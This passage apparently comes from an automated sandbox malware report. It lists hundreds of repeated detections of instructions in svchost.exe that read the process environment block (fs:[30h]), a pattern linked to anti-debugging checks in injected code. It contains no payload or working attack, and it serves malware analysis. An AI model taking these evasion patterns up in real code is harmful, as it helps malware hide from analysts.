            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A430 mov eax, dword ptr fs:[00000030h]2_2_0326A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA38 mov eax, dword ptr fs:[00000030h]2_2_0326CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
